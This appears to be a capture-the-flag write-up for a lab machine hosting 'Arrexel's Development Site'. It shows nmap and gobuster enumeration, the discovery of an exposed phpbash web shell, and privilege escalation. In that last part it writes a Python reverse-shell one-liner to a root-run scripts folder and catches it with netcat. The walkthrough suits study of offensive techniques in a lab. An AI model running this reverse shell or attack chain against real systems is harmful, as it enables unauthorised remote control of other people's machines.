Enumeration
Port Scan
1
2
3
4
5
6
7
8
9
10
11
12
$ nmap -sC -sV -oA nmap/initial 10.129.96.217
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 12:00 EST
Nmap scan report for 10.129.96.217
Host is up (0.079s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.21 seconds
Directory Enumeration (http - 80/tcp)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ /go/bin/gobuster dir -u http://10.129.96.217 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.96.217
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/02/13 12:17:34 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 315] [--> http://10.129.96.217/images/]
/uploads (Status: 301) [Size: 316] [--> http://10.129.96.217/uploads/]
/php (Status: 301) [Size: 312] [--> http://10.129.96.217/php/]
/css (Status: 301) [Size: 312] [--> http://10.129.96.217/css/]
/dev (Status: 301) [Size: 312] [--> http://10.129.96.217/dev/]
/js (Status: 301) [Size: 311] [--> http://10.129.96.217/js/]
/fonts (Status: 301) [Size: 314] [--> http://10.129.96.217/fonts/]
/server-status (Status: 403) [Size: 301]
===============================================================
2021/02/13 12:46:37 Finished
===============================================================
Web Browser (http - 80/tcp)
- Web shell found at
http://10.129.96.217/dev/phpbash.php
User Flag:
cat /home/arrexel/user.txt
Exploitation
N/A
Privilege Escalation
- Upgrade web shell
- Create call back file
1
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.75",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> /scripts/reverseshell.py
- Catch the reverse shell
1
nc -lvnp 8080
- Create call back file
Root Flag:
cat /root/root.txt